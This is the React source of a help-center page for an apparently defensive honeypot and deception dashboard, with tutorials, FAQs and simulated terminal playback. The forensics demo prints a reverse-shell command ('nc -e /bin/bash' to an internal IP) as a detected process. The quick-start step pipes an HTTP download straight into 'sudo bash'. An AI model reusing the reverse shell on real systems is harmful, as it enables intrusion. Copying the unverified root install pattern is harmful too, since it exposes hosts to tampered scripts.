
import React, { useState, useEffect, useRef } from 'react';
import { BookOpen, HelpCircle, Video, FileText, ChevronDown, ChevronUp, PlayCircle, ExternalLink, Zap, Shield, Terminal, LifeBuoy, ArrowLeft, CheckCircle, Clock, Play, Pause, Volume2, Maximize, SkipBack, SkipForward, Loader, RefreshCw } from 'lucide-react';

const TUTORIALS = [
    {
        id: 1,
        title: "Quick Start: First Deployment",
        description: "Learn how to flash a Raspberry Pi, run the bootstrap script, and enroll your first actor into the fleet.",
        time: "5 min",
        level: "Beginner",
        icon: Terminal,
        color: "text-blue-400",
        bg: "bg-blue-500/10",
        border: "border-blue-500/30",
        steps: [
            { title: "Prepare the Hardware", text: "Ensure your Raspberry Pi (3B+ or 4) has a fresh install of Raspberry Pi OS Lite (64-bit recommended) and internet access." },
            { title: "Generate Enrollment Token", text: "In the Dashboard sidebar, click 'Enroll New Device'. Select 'Direct to Cloud' or a specific Gateway." },
            { title: "Run Bootstrap Command", text: "Copy the provided curl command. Paste it into your Raspberry Pi terminal via SSH.", code: "curl -sL http://vpp.io/api/setup?token=YOUR_TOKEN | sudo bash" },
            { title: "Approve Device", text: "Once the script finishes, the device will appear in 'Pending Approvals'. Click the Green checkmark to adopt it." }
        ]
    },
    {
        id: 2,
        title: "Mastering Personas",
        description: "How to switch device identities (e.g., from Printer to PLC) to deceive different types of attackers.",
        time: "3 min",
        level: "Intermediate",
        icon: Zap,
        color: "text-purple-400",
        bg: "bg-purple-500/10",
        border: "border-purple-500/30",
        steps: [
            { title: "Select Target Actor", text: "Navigate to the 'Fleet Matrix' or Dashboard and click on an online node to open details." },
            { title: "Open Deception Tab", text: "Switch to the 'DECEPTION & PERSONA' tab in the top navigation bar." },
            { title: "Choose Identity", text: "Review available Personas (Printer, Camera, Server). Note any port conflicts marked in red." },
            { title: "Apply & Verify", text: "Click a Persona. The agent will restart networking, spoof the MAC OUI, and open fake ports. Use Nmap externally to verify." }
        ]
    },
    {
        id: 3,
        title: "Sentinel Mode & Lockdowns",
        description: "Understanding the 'Paranoid' TCP Sentinel mode and when to use it during an active breach.",
        time: "4 min",
        level: "Advanced",
        icon: Shield,
        color: "text-red-400",
        bg: "bg-red-500/10",
        border: "border-red-500/30",
        steps: [
            { title: "Understanding Sentinel", text: "Sentinel Mode configures iptables to log EVERY TCP SYN packet. This is noisy but catches stealth scans." },
            { title: "Activation", text: "In the 'NETWORK' tab of an actor, toggle 'TCP Sentinel (Paranoid Mode)'. The dashboard will show a pulsing eye icon." },
            { title: "Monitoring", text: "Go to the Dashboard Overview. Any connection attempt will immediately trigger a CRITICAL alert and visualize the source IP." },
            { title: "Deactivation", text: "Once the threat is identified, disable Sentinel Mode to reduce log volume and return to standard honeypot operations." }
        ]
    },
    {
        id: 4,
        title: "Analyzing Forensic Snapshots",
        description: "A deep dive into reading memory dumps, process trees, and auth logs generated by the forensic tool.",
        time: "8 min",
        level: "Expert",
        icon: FileText,
        color: "text-emerald-400",
        bg: "bg-emerald-500/10",
        border: "border-emerald-500/30",
        steps: [
            { title: "Trigger Snapshot", text: "In the 'FORENSICS' tab, click 'RUN FORENSIC SCAN'. This commands the agent to dump volatile data." },
            { title: "Process Tree Analysis", text: "Look for processes with high CPU usage or names like 'nc', 'bash' (running as www-data), or crypto miners." },
            { title: "Network Connections", text: "Examine the 'Network Artifacts' section. Look for ESTABLISHED connections to unknown external IPs on non-standard ports." },
            { title: "Persistence Check", text: "Review the Auth Log snippet for 'Accepted password' or 'New session' events you didn't authorize." }
        ]
    }
];

const FAQS = [
    {
        q: "What exactly does the Virtual Puppets agent do?",
        a: "The agent (vpp-agent) is a lightweight daemon that runs on Linux devices (typically Raspberry Pis). It manages local iptables for traffic control, establishes reverse tunnels to the C2 server, and can emulate various services (SSH, HTTP, FTP) to trap attackers. It also collects telemetry like CPU usage and wireless signals."
    },
    {
        q: "How do I reset a 'Compromised' node?",
        a: "If a node is flagged as COMPROMISED, go to the Actor Detail view. You can either click 'Acknowledge Alert' to simply clear the status if it was a false positive, or use 'Factory Reset' to wipe the agent's local state, clear tunnels, and restart networking."
    },
    {
        q: "Is the traffic real or simulated?",
        a: "In 'Production' mode (connected to a database), the traffic logs are real events reported by your agents. In 'Mock' mode, the system generates simulated traffic patterns for demonstration and training purposes."
    },
    {
        q: "What network ports does the agent require?",
        a: "The agent primarily needs outbound HTTPS (TCP/443) access to the C2 server API. If using Tunneling/Traps, it may also require outbound TCP connections on ephemeral ports to the Trap Server. No inbound port forwarding on your firewall is strictly necessary for standard operation."
    },
    {
        q: "Can I run this on a VM instead of a Raspberry Pi?",
        a: "Yes! The installation script supports Ubuntu 20.04+, Debian 11+, and Kali Linux. You can deploy it on AWS EC2, a local VM, or even a Docker container (with --privileged mode for iptables access)."
    },
    {
        q: "What is 'Ghost Mode'?",
        a: "Ghost Mode is a high-interaction session recorder. When an attacker interacts with a projected Trap (like a fake Telnet service), the session is recorded keystroke-by-keystroke. You can replay these sessions in the Forensics tab to understand the attacker's methodology."
    }
];

// Scripts for the simulated video player
const SCRIPTS: Record<string, string[]> = {
    "Quick Start: First Deployment": [
        "admin@console:~$ curl -sL http://vpp.io/setup | sudo bash",
        "[sudo] password for admin: ",
        "[+] Downloading VPP Agent Installer...",
        "[+] Verifying Integrity... OK",
        "[+] Unpacking components...",
        "[+] Initializing secure tunnel...",
        "[+] Connecting to C2 Server...",
        "root@host:~# vpp-agent --status",
        "Agent Status: ONLINE",
        "Gateway: CONNECTED",
        "Waiting for adoption...",
        "Device adopted successfully. Configuration sync complete."
    ],
    "Mastering Personas": [
        "root@node-01:~# vpp-agent --status",
        "Current Persona: Generic Linux",
        "root@node-01:~# vpp-agent --set-persona 'HP Printer'",
        "[+] Stopping network services...",
        "[+] Spoofing MAC Address: 00:1B:78:2F:A1:C9",
        "[+] Opening Port 9100 (JetDirect)...",
        "[+] Opening Port 631 (IPP)...",
        "[+] Updating Service Banners...",
        "root@node-01:~# nmap -sV localhost",
        "PORT     STATE SERVICE     VERSION",
        "9100/tcp open  jetdirect   HP JetDirect 2.0",
        "631/tcp  open  ipp         CUPS 2.2",
        "Persona Switched Successfully."
    ],
    "Sentinel Mode & Lockdowns": [
        "root@node-05:~# tail -f /var/log/vpp-agent.log",
        "Monitoring traffic...",
        "root@node-05:~# vpp-agent --sentinel on",
        "[!] ACTIVATING PARANOID MODE [!]",
        "[+] IPTables: LOG --tcp-flags SYN",
        "[+] Alerting Level: CRITICAL",
        "[SENTINEL] Listening for stealth scans...",
        "[ALERT] INBOUND SYN from 192.168.1.55:44322 -> :80",
        "[ALERT] INBOUND SYN from 192.168.1.55:44323 -> :443",
        "[AUTO-DEFENSE] Flagging node as COMPROMISED."
    ],
    "Analyzing Forensic Snapshots": [
        "root@node-02:~# vpp-agent --forensic --dump-mem",
        "[+] Dumping volatile memory...",
        "[+] Extracting network artifacts...",
        "[+] Parsing process tree...",
        "Found suspicious process: PID 4490 (nc)",
        "Connection: 192.168.1.101:4444 -> 10.0.0.5:8888",
        "[+] Snapshot saved: snap-20231025.json",
        "root@node-02:~# grep '4490' snap-20231025.json",
        "\"pid\": 4490, \"cmd\": \"nc -e /bin/bash 10.0.0.5 8888\""
    ]
};

// --- MOCK VIDEO PLAYER COMPONENT ---
const MockPlayer = ({ title }: { title: string }) => {
    const [isPlaying, setIsPlaying] = useState(false);
    const [progress, setProgress] = useState(0);
    const [isBuffering, setIsBuffering] = useState(false);
    const [terminalLines, setTerminalLines] = useState<string[]>([]);
    
    // Playback state refs
    const intervalRef = useRef<number | null>(null);
    const scriptIndexRef = useRef(0);
    const charIndexRef = useRef(0);
    const script = SCRIPTS[title] || SCRIPTS["Quick Start: First Deployment"];

    const stopPlayback = () => {
        if (intervalRef.current) clearInterval(intervalRef.current);
        setIsPlaying(false);
        setIsBuffering(false);
    };

    const startPlayback = () => {
        setIsPlaying(true);
        setIsBuffering(true);
        
        // Reset if at end
        if (progress >= 100) {
            setProgress(0);
            setTerminalLines([]);
            scriptIndexRef.current = 0;
            charIndexRef.current = 0;
        }

        // Simulate buffer
        setTimeout(() => {
            setIsBuffering(false);
            
            // Start typing loop
            intervalRef.current = window.setInterval(() => {
                const currentLine = script[scriptIndexRef.current];
                
                if (!currentLine) {
                    // End of script
                    if (intervalRef.current) clearInterval(intervalRef.current);
                    setIsPlaying(false);
                    setProgress(100);
                    return;
                }

                if (charIndexRef.current < currentLine.length) {
                    // Typing current line
                    const partial = currentLine.substring(0, charIndexRef.current + 1);
                    setTerminalLines(prev => {
                        const newLines = [...prev];
                        if (newLines.length === 0 || charIndexRef.current === 0) newLines.push(partial);
                        else newLines[newLines.length - 1] = partial;
                        return newLines;
                    });
                    charIndexRef.current += 2; // Type speed
                } else {
                    // Line finished, pause briefly then move to next
                    if (intervalRef.current) clearInterval(intervalRef.current);
                    
                    setTimeout(() => {
                        scriptIndexRef.current++;
                        charIndexRef.current = 0;
                        if (scriptIndexRef.current < script.length) {
                            startPlayback(); // Resume loop via recursion (simplifies logic)
                        } else {
                            setIsPlaying(false);
                            setProgress(100);
                        }
                    }, 500); 
                }
                
                // Update Progress bar roughly based on lines
                setProgress((scriptIndexRef.current / script.length) * 100);

            }, 50);
        }, 1200);
    };

    // Cleanup
    useEffect(() => {
        return () => {
            if (intervalRef.current) clearInterval(intervalRef.current);
        };
    }, []);

    // Handle Title change reset
    useEffect(() => {
        stopPlayback();
        setTerminalLines([]);
        setProgress(0);
        scriptIndexRef.current = 0;
        charIndexRef.current = 0;
    }, [title]);

    const handleTogglePlay = () => {
        if (isPlaying) stopPlayback();
        else startPlayback();
    };

    return (
        <div className="w-full aspect-video bg-black rounded-lg border border-slate-700 relative group overflow-hidden shadow-2xl flex flex-col">
            {/* Screen Content */}
            <div className="flex-1 flex flex-col bg-slate-900/50 relative overflow-hidden">
                <div className="absolute inset-0 bg-[url('https://www.transparenttextures.com/patterns/carbon-fibre.png')] opacity-20 pointer-events-none"></div>
                
                {/* Simulated Terminal Screen */}
                {(isPlaying || progress > 0) && !isBuffering && (
                    <div className="absolute inset-0 p-4 font-mono text-xs md:text-sm text-green-500 bg-black/90 overflow-y-auto">
                        {terminalLines.map((line, i) => (
                            <div key={i} className="mb-1 break-all">
                                {line}
                                {i === terminalLines.length - 1 && isPlaying && <span className="inline-block w-2 h-4 bg-green-500 animate-pulse ml-1 align-middle"></span>}
                            </div>
                        ))}
                    </div>
                )}

                {/* Scanline Effect */}
                {isPlaying && <div className="absolute inset-0 bg-[linear-gradient(rgba(18,16,16,0)_50%,rgba(0,0,0,0.25)_50%),linear-gradient(90deg,rgba(255,0,0,0.06),rgba(0,255,0,0.02),rgba(0,0,255,0.06))] bg-[length:100%_4px,3px_100%] pointer-events-none animate-pulse"></div>}

                {/* Loading / Start Overlay */}
                {(!isPlaying && progress === 0) && (
                    <div className="absolute inset-0 flex items-center justify-center bg-black/40 backdrop-blur-[1px]">
                        <button 
                            onClick={handleTogglePlay}
                            className="w-20 h-20 bg-blue-600/90 rounded-full flex items-center justify-center shadow-[0_0_30px_rgba(37,99,235,0.3)] hover:scale-110 transition-transform z-10 group/play"
                        >
                            <Play className="w-10 h-10 text-white ml-1.5 group-hover/play:scale-110 transition-transform" />
                        </button>
                    </div>
                )}

                {/* Buffering Indicator */}
                {isBuffering && (
                    <div className="absolute inset-0 flex flex-col items-center justify-center bg-black/60 z-20">
                        <Loader className="w-10 h-10 mb-2 animate-spin text-blue-500" />
                        <span className="text-slate-400 font-mono text-xs tracking-widest animate-pulse">ESTABLISHING FEED...</span>
                    </div>
                )}

                {/* Title Overlay */}
                <div className="absolute top-4 left-4 text-white font-bold text-lg drop-shadow-md bg-black/50 px-3 py-1 rounded backdrop-blur-md border border-white/10 flex items-center">
                    <Video className="w-4 h-4 mr-2 text-blue-400" />
                    {title}
                </div>
            </div>

            {/* Controls */}
            <div className="h-12 bg-slate-800 border-t border-slate-700 flex items-center px-4 space-x-4 z-20 select-none">
                <button onClick={handleTogglePlay} className="text-slate-300 hover:text-white transition-colors">
                    {isPlaying ? <Pause className="w-5 h-5" /> : (progress >= 100 ? <RefreshCw className="w-5 h-5" /> : <Play className="w-5 h-5" />)}
                </button>
                
                {/* Progress Bar */}
                <div className="flex-1 h-1.5 bg-slate-600 rounded-full overflow-hidden cursor-pointer relative group/bar" onClick={() => {}}>
                    <div 
                        className="absolute top-0 left-0 h-full bg-blue-500 transition-all duration-300"
                        style={{ width: `${progress}%` }}
                    ></div>
                </div>
                
                <span className="text-xs font-mono text-slate-400">
                    {Math.floor((progress / 100) * 5)}:{(Math.floor(((progress / 100) * 300) % 60)).toString().padStart(2, '0')} / 05:00
                </span>
                <Volume2 className="w-5 h-5 text-slate-400 hover:text-white cursor-pointer" />
                <Maximize className="w-5 h-5 text-slate-400 hover:text-white cursor-pointer" />
            </div>
        </div>
    );
};

const HelpCenter = () => {
    const [activeTab, setActiveTab] = useState<'TUTORIALS' | 'FAQ'>('TUTORIALS');
    const [openFaqIndex, setOpenFaqIndex] = useState<number | null>(0);
    const [selectedTutorial, setSelectedTutorial] = useState<any>(null);

    return (
        <div className="p-6 max-w-6xl mx-auto animate-fade-in h-full flex flex-col">
            
            {/* HEADER */}
            <div className="flex flex-col md:flex-row justify-between items-start md:items-center mb-8 shrink-0">
                {!selectedTutorial ? (
                    <div>
                        <h2 className="text-3xl font-bold text-slate-200 flex items-center">
                            <LifeBuoy className="w-8 h-8 mr-3 text-blue-400" />
                            Help & Knowledge Base
                        </h2>
                        <p className="text-slate-500 text-sm mt-1">Documentation, guides, and support resources for Virtual Puppets.</p>
                    </div>
                ) : (
                    <div className="flex items-center">
                        <button 
                            onClick={() => setSelectedTutorial(null)}
                            className="bg-slate-800 hover:bg-slate-700 p-2 rounded-full mr-4 text-slate-400 hover:text-white transition-colors border border-slate-700"
                        >
                            <ArrowLeft className="w-5 h-5" />
                        </button>
                        <div>
                            <div className="flex items-center space-x-3 mb-1">
                                <span className={`px-2 py-0.5 rounded text-[10px] font-bold uppercase border ${selectedTutorial.bg} ${selectedTutorial.color} ${selectedTutorial.border}`}>
                                    {selectedTutorial.level}
                                </span>
                                <span className="text-slate-500 text-xs flex items-center"><Clock className="w-3 h-3 mr-1"/> {selectedTutorial.time} Read</span>
                            </div>
                            <h2 className="text-2xl font-bold text-white">{selectedTutorial.title}</h2>
                        </div>
                    </div>
                )}

                {!selectedTutorial && (
                    <div className="flex space-x-4 mt-4 md:mt-0">
                        <button 
                            onClick={() => setActiveTab('TUTORIALS')}
                            className={`px-6 py-2 rounded-lg font-bold text-sm transition-all flex items-center ${activeTab === 'TUTORIALS' ? 'bg-blue-600 text-white shadow-lg shadow-blue-900/20' : 'bg-slate-800 text-slate-400 hover:text-white'}`}
                        >
                            <Video className="w-4 h-4 mr-2" /> Tutorials
                        </button>
                        <button 
                            onClick={() => setActiveTab('FAQ')}
                            className={`px-6 py-2 rounded-lg font-bold text-sm transition-all flex items-center ${activeTab === 'FAQ' ? 'bg-blue-600 text-white shadow-lg shadow-blue-900/20' : 'bg-slate-800 text-slate-400 hover:text-white'}`}
                        >
                            <HelpCircle className="w-4 h-4 mr-2" /> Q & A
                        </button>
                    </div>
                )}
            </div>

            <div className="flex-1 overflow-y-auto pr-2 pb-10">
                {activeTab === 'TUTORIALS' && !selectedTutorial && (
                    <div className="grid grid-cols-1 md:grid-cols-2 gap-6">
                        {/* Featured Video Placeholder */}
                        <div className="md:col-span-2 bg-slate-900 rounded-xl border border-slate-700 overflow-hidden relative group cursor-pointer aspect-video md:aspect-[3/1]">
                            <div className="absolute inset-0 bg-gradient-to-r from-slate-900 to-transparent z-10"></div>
                            {/* Mock Video UI */}
                            <div className="absolute inset-0 flex items-center justify-center z-20">
                                <div className="w-16 h-16 bg-blue-600/90 rounded-full flex items-center justify-center shadow-2xl group-hover:scale-110 transition-transform">
                                    <PlayCircle className="w-8 h-8 text-white ml-1" />
                                </div>
                            </div>
                            <div className="absolute bottom-0 left-0 p-8 z-20 max-w-2xl">
                                <span className="bg-blue-600 text-white text-xs font-bold px-2 py-1 rounded mb-3 inline-block">NEW FEATURE</span>
                                <h3 className="text-2xl font-bold text-white mb-2">Introduction to Wireless Reconnaissance</h3>
                                <p className="text-slate-300 text-sm">Learn how to use your deployed agents to passively map nearby Wi-Fi networks and Bluetooth devices to detect physical threats.</p>
                            </div>
                            {/* Background Pattern */}
                            <div className="absolute inset-0 opacity-20 bg-[url('https://www.transparenttextures.com/patterns/cubes.png')]"></div>
                        </div>

                        {TUTORIALS.map((tut) => (
                            <div 
                                key={tut.id} 
                                onClick={() => setSelectedTutorial(tut)}
                                className={`p-6 rounded-xl border ${tut.border} bg-slate-800/50 hover:bg-slate-800 transition-all cursor-pointer group relative overflow-hidden`}
                            >
                                <div className={`absolute top-0 right-0 p-3 opacity-10 group-hover:opacity-20 transition-opacity`}>
                                    <tut.icon className="w-24 h-24" />
                                </div>
                                <div className="flex justify-between items-start mb-4 relative z-10">
                                    <div className={`p-3 rounded-lg ${tut.bg}`}>
                                        <tut.icon className={`w-6 h-6 ${tut.color}`} />
                                    </div>
                                    <span className="text-[10px] uppercase font-bold tracking-wider text-slate-500 bg-slate-900 px-2 py-1 rounded border border-slate-700">{tut.level}</span>
                                </div>
                                <h3 className="text-lg font-bold text-white mb-2 relative z-10 group-hover:text-blue-400 transition-colors">{tut.title}</h3>
                                <p className="text-slate-400 text-sm mb-4 relative z-10 h-10 line-clamp-2">{tut.description}</p>
                                <div className="flex items-center text-xs text-slate-500 font-mono relative z-10">
                                    <span className="flex items-center mr-4"><Video className="w-3 h-3 mr-1" /> {tut.time}</span>
                                    <span className="flex items-center text-blue-400 opacity-0 group-hover:opacity-100 transition-opacity">Start Guide &rarr;</span>
                                </div>
                            </div>
                        ))}
                    </div>
                )}

                {/* TUTORIAL DETAIL VIEW */}
                {activeTab === 'TUTORIALS' && selectedTutorial && (
                    <div className="animate-slide-up space-y-8">
                        {/* Video Player Area */}
                        <MockPlayer title={selectedTutorial.title} />

                        {/* Content Area */}
                        <div className="grid grid-cols-1 lg:grid-cols-3 gap-8">
                            <div className="lg:col-span-2 space-y-6">
                                <div className="bg-slate-800/50 border border-slate-700 rounded-xl p-6">
                                    <h3 className="text-lg font-bold text-white mb-4">Step-by-Step Guide</h3>
                                    <div className="space-y-6">
                                        {selectedTutorial.steps?.map((step: any, idx: number) => (
                                            <div key={idx} className="flex gap-4">
                                                <div className="flex flex-col items-center">
                                                    <div className={`w-8 h-8 rounded-full flex items-center justify-center font-bold text-sm shrink-0 ${idx === 0 ? 'bg-blue-600 text-white' : 'bg-slate-700 text-slate-300'}`}>
                                                        {idx + 1}
                                                    </div>
                                                    {idx < selectedTutorial.steps.length - 1 && (
                                                        <div className="w-0.5 flex-1 bg-slate-700 my-2"></div>
                                                    )}
                                                </div>
                                                <div className="pb-2">
                                                    <h4 className="text-white font-bold text-sm mb-1">{step.title}</h4>
                                                    <p className="text-slate-400 text-sm leading-relaxed">{step.text}</p>
                                                    {step.code && (
                                                        <div className="mt-3 bg-black rounded border border-slate-700 p-3 group relative">
                                                            <code className="text-emerald-400 font-mono text-xs break-all">{step.code}</code>
                                                            <button 
                                                                onClick={() => navigator.clipboard.writeText(step.code)}
                                                                className="absolute top-2 right-2 bg-slate-800 p-1.5 rounded text-slate-400 hover:text-white opacity-0 group-hover:opacity-100 transition-opacity"
                                                                title="Copy"
                                                            >
                                                                <CheckCircle className="w-3 h-3" />
                                                            </button>
                                                        </div>
                                                    )}
                                                </div>
                                            </div>
                                        ))}
                                    </div>
                                </div>
                            </div>

                            {/* Sidebar Info */}
                            <div className="space-y-4">
                                <div className="bg-blue-900/20 border border-blue-500/30 rounded-xl p-5">
                                    <h4 className="text-blue-400 font-bold text-sm mb-2 flex items-center"><Zap className="w-4 h-4 mr-2"/> Key Takeaways</h4>
                                    <ul className="text-xs text-blue-200 space-y-2 list-disc list-inside">
                                        <li>Always verify connectivity after deployment.</li>
                                        <li>Use Personas to match the physical environment.</li>
                                        <li>Sentinel mode generates high log volume.</li>
                                    </ul>
                                </div>
                                
                                <div className="bg-slate-800 border border-slate-700 rounded-xl p-5">
                                    <h4 className="text-white font-bold text-sm mb-3">Related Topics</h4>
                                    <ul className="space-y-2">
                                        {TUTORIALS.filter(t => t.id !== selectedTutorial.id).slice(0,3).map(t => (
                                            <li key={t.id}>
                                                <button 
                                                    onClick={() => setSelectedTutorial(t)}
                                                    className="text-xs text-slate-400 hover:text-blue-400 flex items-center transition-colors text-left"
                                                >
                                                    <PlayCircle className="w-3 h-3 mr-2 shrink-0" />
                                                    {t.title}
                                                </button>
                                            </li>
                                        ))}
                                    </ul>
                                </div>
                            </div>
                        </div>
                    </div>
                )}

                {activeTab === 'FAQ' && (
                    <div className="max-w-4xl mx-auto space-y-4">
                        <div className="bg-blue-900/20 border border-blue-500/30 p-4 rounded-lg mb-6 flex items-start">
                            <BookOpen className="w-5 h-5 text-blue-400 mr-3 mt-0.5" />
                            <div>
                                <h4 className="text-blue-300 font-bold text-sm mb-1">Documentation Library</h4>
                                <p className="text-blue-200/70 text-xs">For detailed API references, architecture diagrams, and security whitepapers, please visit our internal wiki.</p>
                                <a href="#" className="text-blue-400 text-xs font-bold mt-2 inline-flex items-center hover:underline">Open Wiki <ExternalLink className="w-3 h-3 ml-1"/></a>
                            </div>
                        </div>

                        {FAQS.map((faq, index) => {
                            const isOpen = openFaqIndex === index;
                            return (
                                <div key={index} className={`border rounded-lg transition-all duration-300 overflow-hidden ${isOpen ? 'bg-slate-800 border-blue-500/50' : 'bg-slate-900 border-slate-700 hover:border-slate-600'}`}>
                                    <button 
                                        onClick={() => setOpenFaqIndex(isOpen ? null : index)}
                                        className="w-full flex justify-between items-center p-4 text-left focus:outline-none"
                                    >
                                        <span className={`font-bold text-sm ${isOpen ? 'text-blue-400' : 'text-slate-300'}`}>{faq.q}</span>
                                        {isOpen ? <ChevronUp className="w-4 h-4 text-blue-500" /> : <ChevronDown className="w-4 h-4 text-slate-500" />}
                                    </button>
                                    {isOpen && (
                                        <div className="px-4 pb-4 text-slate-400 text-sm leading-relaxed border-t border-slate-700/50 pt-3 animate-fade-in">
                                            {faq.a}
                                        </div>
                                    )}
                                </div>
                            );
                        })}

                        <div className="mt-12 text-center pt-8 border-t border-slate-800">
                            <p className="text-slate-500 text-sm mb-4">Still need help? Our security engineers are available 24/7.</p>
                            <button className="bg-slate-800 hover:bg-slate-700 text-white px-6 py-2 rounded-full font-bold text-sm transition-colors border border-slate-600">
                                Contact Support
                            </button>
                        </div>
                    </div>
                )}
            </div>
        </div>
    );
};

export default HelpCenter;
